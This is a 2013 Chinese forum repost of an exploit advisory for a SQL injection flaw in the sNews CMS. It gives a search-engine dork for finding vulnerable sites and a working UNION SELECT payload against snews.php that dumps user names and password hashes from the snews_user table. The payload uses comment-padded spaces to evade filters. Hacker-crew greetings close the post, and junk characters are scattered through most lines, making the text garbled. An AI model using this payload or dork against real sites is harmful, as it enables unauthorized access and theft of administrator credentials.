标题: CMS snews SQL Injection Vulnerability- c2 k2 c9 i+ N
作者: By onestree8 u' p0 f3 Z6 I# b: j8 q( f
下载地址 : http://snewscms.com/
! B. H; x0 _; ~4 h0 R. E- s& a测试平台 : ubuntu 12.10 / win 7
) ^& [1 Z/ P+ X: G1 Z1 w9 K- Z关键词: inurl:"tanyakan pada rumput yang bergoyang"
( c1 T9 Q. O& r, Y
& J/ t) [/ {8 I4 t ' D8 ^& S9 m! ?0 H" d! {
*************************************************************
& h4 h2 v' S) T; F
( A2 B7 N' [7 dSQL poc:/ w+ F. u0 P+ e8 \. j- | z
' M9 G7 p$ ^/ phttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
2 v; R$ w) `: x7 h
9 y: j& B: K) N9 @# s6 y; h2 i示例% ~( Z5 o6 d: m+ I, n7 \
' c) r% ?4 S9 o' q) b4 {) \" \, L
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*6 |5 r& t" [8 A* L. x
5 Q, E6 c& S( A5 {, B/ e ' b' Y o+ y1 V
致谢:: r6 C% f6 z) V# n
! c7 o8 H. w8 F9 t. w Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell" X% y+ F3 X- e6 s ?- R$ ~
6 k4 i; B" K. ?/ D0 \; w; {
indonesiancoder - moeslimh4x0r - go-coder1 a. d6 u" _, d, M1 m
/ }! C% F9 `1 ^. ^9 a
spesial my hunny :*
7 S$ k; C5 E, Z1 H: W5 J% e |
发表于 2013-1-23 08:55:06
收藏
支持
反对